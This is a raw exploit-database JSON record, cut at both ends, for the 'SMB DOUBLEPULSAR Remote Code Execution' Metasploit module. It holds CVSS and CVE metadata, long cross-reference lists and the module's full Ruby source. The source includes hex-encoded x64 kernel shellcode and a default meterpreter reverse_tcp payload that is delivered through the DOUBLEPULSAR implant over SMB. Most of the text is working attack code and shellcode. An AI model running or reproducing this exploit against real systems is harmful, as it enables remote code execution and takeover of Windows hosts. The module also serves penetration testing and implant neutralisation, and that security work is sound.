\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-07] #"}, "lastseen": "2021-10-06T22:17:02", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "dd2ec6a7ad6bcca169764af4ce7a284e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-08T00:16:50", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", 
"1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:16:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-08T00:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n 